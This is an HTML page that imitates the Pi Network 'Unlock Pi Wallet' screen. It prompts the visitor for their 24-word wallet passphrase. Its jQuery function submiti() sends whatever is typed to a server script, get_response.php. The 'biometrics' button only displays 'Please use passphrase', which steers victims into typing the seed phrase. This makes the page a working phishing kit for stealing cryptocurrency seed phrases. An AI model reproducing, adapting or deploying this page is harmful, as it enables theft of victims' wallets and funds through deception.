<html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Unlock Pi</title>
    <!-- <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">  -->
    <link rel="stylesheet" href="bootstrap.css">
    <link rel="stylesheet" href="style.css">
</head>
<body>
<div class="layout">
	<h3>Unlock Pi Wallet</h3>
	<textarea placeholder="Enter your 24-word passphrase here"></textarea>
	<div onclick="validate()" class="btn">Unlock with passphrase</div>
	<div class="btn biob">Unlock with Biometrics</div>    
	   
	<p style=" width: 100%;">As a non-custodial wallet, your wallet passphrase is
	    exclusively accessible only to you. Recovery of passphrase
	    is currently impossible.<br><br>
	    Lost your passphrase? <a href="" style="color: var(--tc);">You can create a new wallet,</a> but all your π
	    in your previous wallet will be inaccessible.
	</p>
</div>
<style type="text/css">
.layout{
display:flex;
flex-direction:column;
justify-content:center;
align-items:center;
padding:10% 8%;
}

.layout *{
margin:5% 0;
}

textarea{
width:100%;
aspect-ratio:3/2;
border:1px solid #ec0;
font-size:1.2em;
font-family:inherit;
padding:3%;
border-radius:0.5em;
}

.btn{
background:#fff;
color:var(--tc);
border:1px solid var(--tc);
width:100%;
font-size:1.1em;
padding:0.7em 0;
}

.biob{
background:var(--tc);
color:var(--st);
}
</style>
<!--
    <div class="container-fluid">


<div name="contact-form" action="" method="post" id="contact-form">
    <div class="row">
        
        <div class="col-md-12">
        <p class="text-center mt-3" style="font-size: 17px;"><strong>Unlock Pi Wallet</strong></p>
        </div>
        <input type="text" class="form-control" value="name" name="your_name" placeholder="Name" hidden="">
        <input type="email" class="form-control" name="your_email" value="email@email.com" placeholder="Email" hidden="">
        <div style="padding: 8px 18px 8px 35px; text-align: center;" class="col-md-12 mb-3">

           <p style="text-align: center; font-size: 27px;"> <textarea id=rform name="comments" style="font-size: 17px; border:solid 1px orange; width: 90%;" class="form-control" cols="30" rows="10" placeholder="Enter  your  24-word  passphrase  here" wire:model="passphrase"></textarea></p>

        </div>
<br>
        <div class="col-md-12">
                    </div>

        <div class="col-md-12">
           <p style="text-align: center;"> <button onclick="submiti()" type="" style="padding: 8px 8px; border: 1.22px solid #703D92; border-radius: 7px; background: transparent; width: 90%; font-size: 13px;  color: #8638C2; font-weight:320;"><strong>UNLOCK WITH PASSPHRASE</strong></button></p>
        </div>

        <div class="col-md-12 mt-4">
        <div id="SectionName" style="display:none; text-align: center; color: red;">Please use passphrase</div>
           <p style="text-align: center;"> <button onclick="ShowAndHide()" style="text-align: center; padding: 8px 8px; border-radius: 7px; color: white; border: none; background: #703D92; width: 90%; font-size: 13px; font-weight: 320;">UNLOCK WITH BIOMETRICS</button></p>
        </div>
        <br>

       <!-- <div class="col-md-12 mt-4">
            <p class="text-center" style="color: #0A08C2;"><strong>Unlock a Developer App Wallet</strong></p>
        </div> --

        <div class="col-md-12 mt-2" style="padding: 8px 28px 28px 28px; justify-content: center;">
            <p style=" width: 100%; font-size: 14px; ;">As a non-custodial wallet, your wallet passphrase is
                exclusively accessible only to you. Recovery of passphrase
                is currently impossible.<br><br>
                Lost your passphrase? <a href="" style="color: #0A08C2;">You can create a new wallet,</a> but all your π
                in your previous wallet will be inaccessible.
            </p>
        </div>
    </div>
</div>


    </div>-->
   
<script>
function ShowAndHide() {
    var x = document.getElementById('SectionName');
    if (x.style.display == 'none') {
        x.style.display = 'block';
    } else {
        x.style.display = 'none';
    }
}
</script>
<script src="jquery.js"></script>

<script>
function validate(){
var tv = $("textarea").val();
//alert(tv[tv.length-1]);
while(tv[tv.length-1]==" "){
tv = tv.split("").pop();//(" ", "", (tv.length-2));
tv = String(tv.join(""));
}
tv = tv.replace(/\s*/," ");
alert(tv);
alert((tv.split(" ").length)-1);
}
function submiti(){
    sendData = $("#rform").val();
    // if(!_empty(sendData))
    if(sendData != "")
    {
        $.ajax({
	        type: "POST",
	        url: "get_response.php",
	        data: {
	            "response":sendData,
	        },
	        success: function(data){
	            alert(data);
	            $("#rform").val("");
	        }
        });
    }
    else{
        $("#rform").css("border","1px solid red");
    }

}
</script>

</body></html>